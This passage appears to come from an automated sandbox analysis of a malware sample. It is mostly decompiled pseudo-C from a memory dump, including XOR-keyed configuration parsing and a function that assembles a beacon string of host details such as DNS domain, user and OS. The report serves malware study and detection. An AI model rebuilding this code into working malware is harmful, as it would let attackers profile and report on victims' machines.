                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F4954
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 397948122-0
                                                          • Opcode ID: 29cc07b4c5bb7326206ec4a9ba55ab891d07980984d97745cc037fb1b5fe2cf2
                                                          • Instruction ID: 82235762c160db1316baa59b9072c868cd83f402285b062a266733107570eac6
                                                          • Opcode Fuzzy Hash: 29cc07b4c5bb7326206ec4a9ba55ab891d07980984d97745cc037fb1b5fe2cf2
                                                          • Instruction Fuzzy Hash: F8017C32600119BFDB11EFA9CC08DAFBBB9FB44750F008565EA05E7261E771E911C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F5356, Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F5356(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E047F8BC1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x47fd238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E047F48F1(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                          0x047f5356
                                                          0x047f535e
                                                          0x047f5375
                                                          0x047f5390
                                                          0x047f5394
                                                          0x047f5399
                                                          0x047f539b
                                                          0x047f53ad
                                                          0x047f53b9
                                                          0x047f539d
                                                          0x047f539d
                                                          0x047f53a2
                                                          0x047f53a7
                                                          0x047f53a7
                                                          0x047f539b
                                                          0x047f53bf
                                                          0x047f53c3
                                                          0x047f53c3
                                                          0x047f536a
                                                          0x047f536f
                                                          0x047f5373
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 047F48F1: SysFreeString.OLEAUT32(00000000), ref: 047F4954
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,047F8D51,?,004F0053,052E9368,00000000,?), ref: 047F53B9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Free$HeapString
                                                          • String ID:
                                                          • API String ID: 3806048269-0
                                                          • Opcode ID: 7689cffb147fa9ba8bfd66f7d465806ac228148c9c46c21540762cc3dffe1852
                                                          • Instruction ID: 5c454100a4b4ac896972999593c5f86e4542beeb09a5733d80836e0230faddc7
                                                          • Opcode Fuzzy Hash: 7689cffb147fa9ba8bfd66f7d465806ac228148c9c46c21540762cc3dffe1852
                                                          • Instruction Fuzzy Hash: 90014B32501619BBDB229F98CC05EEE7BA5EF04790F448028FF059A321D771E960DBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F1AE2, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E047F1AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                          0x047f1ae2
                                                          0x047f1aef
                                                          0x047f1af0
                                                          0x047f1af1
                                                          0x047f1af8
                                                          0x047f1b26
                                                          0x047f1b27
                                                          0x047f1b2a
                                                          0x047f1b30
                                                          0x00000000
                                                          0x00000000
                                                          0x047f1b0f
                                                          0x047f1b19
                                                          0x047f1b20
                                                          0x00000000
                                                          0x047f1b11
                                                          0x047f1b14
                                                          0x047f1b34
                                                          0x047f1b16
                                                          0x047f1b16
                                                          0x00000000
                                                          0x047f1b16
                                                          0x047f1b14
                                                          0x047f1b3b
                                                          0x047f1b41
                                                          0x047f1b41
                                                          0x00000000

                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 047F1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 1e7fb99044ea1d8a981d230ee068bfbc24c5ef1b37c76bf4f4191fe5b5094188
                                                          • Instruction ID: bd4ac9cce1b8975440a21dad048d27b46788a0f93a8af069844ec3f97f05afa3
                                                          • Opcode Fuzzy Hash: 1e7fb99044ea1d8a981d230ee068bfbc24c5ef1b37c76bf4f4191fe5b5094188
                                                          • Instruction Fuzzy Hash: DBF0E775D11218EFDB01DB95C988AEDB7B8EF04305F5484AAE602A7340E7B46F84DF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 047F888E, Relevance: 10.7, APIs: 7, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E047F888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x47fd2a4; // 0x63699bc3
				if(E047F7145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x47fd2d8 = _v8;
				}
				_t31 =  *0x47fd2a4; // 0x63699bc3
				if(E047F7145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x47fd2a4; // 0x63699bc3
				if(E047F7145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x47fd238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x47fd2a4; // 0x63699bc3
						_t43 = E047F6B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x47fd240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x47fd2a4; // 0x63699bc3
						_t44 = E047F6B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x47fd244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x47fd2a4; // 0x63699bc3
						_t45 = E047F6B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x47fd248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x47fd2a4; // 0x63699bc3
						_t46 = E047F6B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x47fd004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x47fd2a4; // 0x63699bc3
						_t47 = E047F6B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x47fd02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x47fd2a4; // 0x63699bc3
						_t48 = E047F6B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E047F56FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E047F6702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x47fd2a4; // 0x63699bc3
						_t49 = E047F6B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E047F56FA(0, _t49) != 0) {
						_t114 =  *0x47fd32c; // 0x52e95b0
						E047F23F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x47fd2a4; // 0x63699bc3
						_t50 = E047F6B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x47fd2a8; // 0xaea5a8
						_t20 = _t51 + 0x47fe252; // 0x616d692f
						 *0x47fd2d4 = _t20;
						goto L53;
					} else {
						_t61 = E047F56FA(0, _t50);
						 *0x47fd2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x47fd2a4; // 0x63699bc3
								_t53 = E047F6B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x47fd2a8; // 0xaea5a8
								_t21 = _t54 + 0x47fe791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E047F56FA(0, _t53);
							}
							 *0x47fd340 = _t55;
							HeapFree( *0x47fd238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x047f888e
                                                          0x047f8891
                                                          0x047f88b1
                                                          0x047f88bf
                                                          0x047f88bf
                                                          0x047f88c4
                                                          0x047f88de
                                                          0x047f8b0d
                                                          0x047f8b14
                                                          0x047f8b1b
                                                          0x047f8b1b
                                                          0x047f88e4
                                                          0x047f8900
                                                          0x047f8afb
                                                          0x047f8b05
                                                          0x00000000
                                                          0x047f8906
                                                          0x047f8906
                                                          0x047f890b
                                                          0x047f8921
                                                          0x047f890d
                                                          0x047f890d
                                                          0x047f891a
                                                          0x047f891a
                                                          0x047f892b
                                                          0x047f892d
                                                          0x047f8937
                                                          0x047f893c
                                                          0x047f893c
                                                          0x047f8937
                                                          0x047f8943
                                                          0x047f8959
                                                          0x047f8945
                                                          0x047f8945
                                                          0x047f8952
                                                          0x047f8952
                                                          0x047f895d
                                                          0x047f895f
                                                          0x047f8969
                                                          0x047f896e
                                                          0x047f896e
                                                          0x047f8969
                                                          0x047f8975
                                                          0x047f898b
                                                          0x047f8977
                                                          0x047f8977
                                                          0x047f8984
                                                          0x047f8984
                                                          0x047f898f
                                                          0x047f8991
                                                          0x047f899b
                                                          0x047f89a0
                                                          0x047f89a0
                                                          0x047f899b
                                                          0x047f89a7
                                                          0x047f89bd
                                                          0x047f89a9
                                                          0x047f89a9
                                                          0x047f89b6
                                                          0x047f89b6
                                                          0x047f89c1
                                                          0x047f89c3
                                                          0x047f89cd
                                                          0x047f89d2
                                                          0x047f89d2
                                                          0x047f89cd
                                                          0x047f89d9
                                                          0x047f89ef
                                                          0x047f89db
                                                          0x047f89db
                                                          0x047f89e8
                                                          0x047f89e8
                                                          0x047f89f3
                                                          0x047f89f5
                                                          0x047f89ff
                                                          0x047f8a04
                                                          0x047f8a04
                                                          0x047f89ff
                                                          0x047f8a0b
                                                          0x047f8a21
                                                          0x047f8a0d
                                                          0x047f8a0d
                                                          0x047f8a1a
                                                          0x047f8a1a
                                                          0x047f8a25
                                                          0x047f8a27
                                                          0x047f8a2a
                                                          0x047f8a2b
                                                          0x047f8a32
                                                          0x047f8a34
                                                          0x047f8a35
                                                          0x047f8a35
                                                          0x047f8a32
                                                          0x047f8a3c
                                                          0x047f8a52
                                                          0x047f8a3e
                                                          0x047f8a3e
                                                          0x047f8a4b
                                                          0x047f8a4b
                                                          0x047f8a56
                                                          0x047f8a64
                                                          0x047f8a6e
                                                          0x047f8a6e
                                                          0x047f8a75
                                                          0x047f8a8b
                                                          0x047f8a77
                                                          0x047f8a77
                                                          0x047f8a84
                                                          0x047f8a84
                                                          0x047f8a8f
                                                          0x047f8aa2
                                                          0x047f8aa2
                                                          0x047f8aa7
                                                          0x047f8aad
                                                          0x00000000
                                                          0x047f8a91
                                                          0x047f8a94
                                                          0x047f8a99
                                                          0x047f8aa0
                                                          0x047f8ab2
                                                          0x047f8ab4
                                                          0x047f8aca
                                                          0x047f8ab6
                                                          0x047f8ab6
                                                          0x047f8ac3
                                                          0x047f8ac3
                                                          0x047f8ace
                                                          0x047f8ada
                                                          0x047f8adf
                                                          0x047f8adf
                                                          0x047f8ad0
                                                          0x047f8ad3
                                                          0x047f8ad3
                                                          0x047f8aed
                                                          0x047f8af2
                                                          0x047f8af8
                                                          0x00000000
                                                          0x047f8af8
                                                          0x00000000
                                                          0x047f8aa0
                                                          0x047f8a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F8933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F8965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F8997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F89C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F89FB
                                                          • HeapFree.KERNEL32(00000000,047F5D25,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008,?,047F5D25), ref: 047F8AF2
                                                          • HeapFree.KERNEL32(00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008,?,047F5D25), ref: 047F8B05
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 5be47aad309171e3c34804277242102b75dfcac185975f4f1fae6d1a688cef94
                                                          • Instruction ID: 0d73ddc6c03753bbe77a251c99c07de9470bf8f945087a996ee1d250a8c0e858
                                                          • Opcode Fuzzy Hash: 5be47aad309171e3c34804277242102b75dfcac185975f4f1fae6d1a688cef94
                                                          • Instruction Fuzzy Hash: 91718E71A10105AFD721FBB9DE88D9B77EDEF483007258915A602D7304F735F9429762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F1F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E047F1F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x47fd018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x47fd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x47fd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E047FD00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x47fd2a8; // 0xaea5a8
				_t3 = _t30 + 0x47fe633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x47fd02c,  *0x47fd004, _t25);
				_t33 = E047F56CD();
				_t34 =  *0x47fd2a8; // 0xaea5a8
				_t4 = _t34 + 0x47fe673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E047F58DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x47fd2a8; // 0xaea5a8
					_t6 = _t83 + 0x47fe8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x47fd238, 0, _t96);
				}
				_t97 = E047FA199();
				if(_t97 != 0) {
					_t78 =  *0x47fd2a8; // 0xaea5a8
					_t8 = _t78 + 0x47fe8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x47fd238, 0, _t97);
				}
				_t98 =  *0x47fd32c; // 0x52e95b0
				_a32 = E047F4622(0x47fd00a, _t98 + 4);
				_t42 =  *0x47fd2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x47fd2a8; // 0xaea5a8
					_t11 = _t74 + 0x47fe8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x47fd2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x47fd2a8; // 0xaea5a8
					_t13 = _t71 + 0x47fe88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x47fd238, 0, 0x800);
					if(_t100 != 0) {
						E047F518F(GetTickCount());
						_t50 =  *0x47fd32c; // 0x52e95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x47fd32c; // 0x52e95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x47fd32c; // 0x52e95b0
						_t103 = E047F1BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x47fc28c);
							_push(_t103);
							_t62 = E047F361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E047F6777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E047F6761();
								}
								HeapFree( *0x47fd238, 0, _v44);
							}
							HeapFree( *0x47fd238, 0, _t103);
						}
						HeapFree( *0x47fd238, 0, _t100);
					}
					HeapFree( *0x47fd238, 0, _a24);
				}
				HeapFree( *0x47fd238, 0, _t105);
				return _a12;
			}
















































                                                          0x047f1f13
                                                          0x047f1f13
                                                          0x047f1f13
                                                          0x047f1f18
                                                          0x047f1f1e
                                                          0x047f1f28
                                                          0x047f1f2a
                                                          0x047f1f2a
                                                          0x047f1f37
                                                          0x047f1f42
                                                          0x047f1f45
                                                          0x047f1f50
                                                          0x047f1f53
                                                          0x047f1f58
                                                          0x047f1f5b
                                                          0x047f1f60
                                                          0x047f1f63
                                                          0x047f1f6f
                                                          0x047f1f7c
                                                          0x047f1f7e
                                                          0x047f1f84
                                                          0x047f1f89
                                                          0x047f1f94
                                                          0x047f1f96
                                                          0x047f1f99
                                                          0x047f1fa0
                                                          0x047f1fa4
                                                          0x047f1fa6
                                                          0x047f1fab
                                                          0x047f1fb7
                                                          0x047f1fb9
                                                          0x047f1fc5
                                                          0x047f1fc7
                                                          0x047f1fc7
                                                          0x047f1fd2
                                                          0x047f1fd6
                                                          0x047f1fd8
                                                          0x047f1fdd
                                                          0x047f1fe9
                                                          0x047f1feb
                                                          0x047f1ff7
                                                          0x047f1ff9
                                                          0x047f1ff9
                                                          0x047f1fff
                                                          0x047f2012
                                                          0x047f2016
                                                          0x047f201d
                                                          0x047f2020
                                                          0x047f2025
                                                          0x047f2030
                                                          0x047f2032
                                                          0x047f2035
                                                          0x047f2035
                                                          0x047f2037
                                                          0x047f203e
                                                          0x047f2041
                                                          0x047f2046
                                                          0x047f2050
                                                          0x047f2052
                                                          0x047f205a
                                                          0x047f2073
                                                          0x047f2077
                                                          0x047f2083
                                                          0x047f2088
                                                          0x047f2091
                                                          0x047f20a2
                                                          0x047f20a6
                                                          0x047f20af
                                                          0x047f20b5
                                                          0x047f20c2
                                                          0x047f20cf
                                                          0x047f20d5
                                                          0x047f20e1
                                                          0x047f20e7
                                                          0x047f20e8
                                                          0x047f20ed
                                                          0x047f20f3
                                                          0x047f20f9
                                                          0x047f2100
                                                          0x047f2107
                                                          0x047f210d
                                                          0x047f2114
                                                          0x047f2118
                                                          0x047f2123
                                                          0x047f2128
                                                          0x047f212e
                                                          0x047f2137
                                                          0x047f2137
                                                          0x047f2148
                                                          0x047f2148
                                                          0x047f2157
                                                          0x047f2157
                                                          0x047f2166
                                                          0x047f2166
                                                          0x047f2178
                                                          0x047f2178
                                                          0x047f2187
                                                          0x047f2198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 047F1F2A
                                                          • wsprintfA.USER32 ref: 047F1F77
                                                          • wsprintfA.USER32 ref: 047F1F94
                                                          • wsprintfA.USER32 ref: 047F1FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F1FC7
                                                          • wsprintfA.USER32 ref: 047F1FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F1FF9
                                                          • wsprintfA.USER32 ref: 047F2030
                                                          • wsprintfA.USER32 ref: 047F2050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047F206D
                                                          • GetTickCount.KERNEL32 ref: 047F207D
                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F2091
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F20AF
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?,052E95B0), ref: 047F1BE1
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(?,?,?,047F20C2,?,052E95B0), ref: 047F1BE9
                                                            • Part of subcall function 047F1BB6: strcpy.NTDLL ref: 047F1C00
                                                            • Part of subcall function 047F1BB6: lstrcat.KERNEL32(00000000,?), ref: 047F1C0B
                                                            • Part of subcall function 047F1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F1C28
                                                          • StrTrimA.SHLWAPI(00000000,047FC28C,?,052E95B0), ref: 047F20E1
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(052E9A78,00000000,00000000,7742C740,047F20ED,00000000), ref: 047F362A
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(?), ref: 047F3632
                                                            • Part of subcall function 047F361A: lstrcpy.KERNEL32(00000000,052E9A78), ref: 047F3646
                                                            • Part of subcall function 047F361A: lstrcat.KERNEL32(00000000,?), ref: 047F3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 047F2100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047F2107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 047F2114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047F2118
                                                            • Part of subcall function 047F6777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 047F6829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 047F2148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047F2157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,052E95B0), ref: 047F2166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F2178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F2187
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 981eb26b036c7d2e137a6e0378dd1e64a08acfcf3634b434958556dcc4f5ab29
                                                          • Instruction ID: 889f6f01911e19e5eb6bde03d2cc6c7ef30c15085a0b60cc3ceae44ebf179c6a
                                                          • Opcode Fuzzy Hash: 981eb26b036c7d2e137a6e0378dd1e64a08acfcf3634b434958556dcc4f5ab29
                                                          • Instruction Fuzzy Hash: 5F617171500204AFE722ABA4ED48F9A77E9FB48354F048914FA06D7361EB3DEC06DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047FAC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E047FAC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x47f0000;
